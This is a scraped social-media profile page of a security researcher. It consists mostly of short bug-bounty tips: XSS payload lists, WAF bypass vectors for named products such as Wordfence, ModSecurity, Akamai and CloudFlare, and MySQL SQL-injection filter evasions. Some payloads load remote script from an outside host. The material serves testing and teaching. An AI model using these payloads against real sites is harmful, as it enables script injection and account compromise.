user avatar
BRute Logic
@BRuteLogic
#CyberSec #AI | #XSS #SQLi #SSRF | #Bypass #Recon | @KN0X55 | knoxss.pro | github.com/BRuteLogic | brutelogic.net/brute-one | brutelogic.net/ebooks
Brazil 🇧🇷
brutelogic.net/research
Joined October 2009
285
Following
65.1K
Followers
Posts
  • Pinned
    user avatar
    BRute Logic
    @BRuteLogic
    May 11
    Replying to @BRuteLogic
    Brute One - AI Assistant for Bug Hunting
    00:00
    2.9K
  • user avatar
    BRute Logic
    @BRuteLogic
    Jun 12, 2019
    Here's a small #XSS list for manual testing (main cases, high success rate). "><img src onerror=alert(1)> "autofocus onfocus=alert(1)// </script><script>alert(1)</script> '-alert(1)-' \'-alert(1)// javascript:alert(1) Try it on: - URL query, fragment & path; - all input fields.
  • user avatar
    BRute Logic
    @BRuteLogic
    May 18, 2019
    Infosec landscape changing.
  • user avatar
    BRute Logic
    @BRuteLogic
    Oct 29, 2019
    Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` SELECT@^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
  • user avatar
    BRute Logic
    @BRuteLogic
    Oct 18, 2021
    The best single #XSS vector you'll ever have! 😎 JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
  • user avatar
    BRute Logic
    @BRuteLogic
    Nov 4, 2019
    #SQLi Without Quotes web.archive.org/web/2018092019…
  • user avatar
    BRute Logic
    @BRuteLogic
    Apr 23, 2018
    Tips to Master Something 1. Expose yourself to basics over and over again. 2. Stick to what you can understand, prove and explain. 3. Always think in new ways to do the same thing better.
  • user avatar
    BRute Logic
    @BRuteLogic
    Nov 24, 2018
    Another brutal secret revealed! 😎 Payload to bypass simple email validation in PHP "><svg/onload=confirm(1)>"@x.y #KNOXSS case #21 check it here: brutelogic.com.br/knoxss.html
  • user avatar
    BRute Logic
    @BRuteLogic
    Nov 6, 2019
    All script-based #XSS vectors. (HTML, no events) <script>alert(1)// <script>alert(1)<!-- <script>alert(1)%0A--> <script src=data:,alert(1)> <script src=//HOST/FILE> <script src=https:DOMAIN/FILE> <svg><script xlink:href=//HOST/FILE> <svg><script xlink:href=https:DOMAIN/FILE>
  • user avatar
    BRute Logic
    @BRuteLogic
    Dec 23, 2019
    Christmas Gifts!🎄 WAF #XSS Bypasses Wordfence 7.4.2 <a href=&#01javascript:alert(1)> Sucuri CloudProxy (POST only) <a href=javascript&colon;confirm(1)> ModSecurity CRS 3.2.0 PL1 <a href="jav%0Dascript&colon;alert(1)"> Encode special chars properly. #MerryChristmas!
  • user avatar
    BRute Logic
    @BRuteLogic
    Dec 31, 2020
    7 Steps to Become a #Hacker 1. Learn 2. Try 3. Learn again 4. Try again 5. Try UNTIL 6. Share 7. Return to 1 #h4ppyn3wy34r
  • user avatar
    BRute Logic
    @BRuteLogic
    Sep 9, 2024
    One #XSS Payload to Rule Them All #Bypass Akamai, Imperva and CloudFlare #WAF <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)> #hack2learn @KN0X55
    101K
  • user avatar
    BRute Logic
    @BRuteLogic
    Feb 21, 2022
    CloudFlare #WAF #XSS #Bypass <Svg Only=1 OnLoad=confirm(1)>
  • user avatar
    BRute Logic
    @BRuteLogic
    Jul 11, 2022
    #XSS PoC Styles Noob: alert(1) Bug Hunter: alert(document.domain) WAF Bypasser: d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b Red Teamer: import('//X55.is/wp')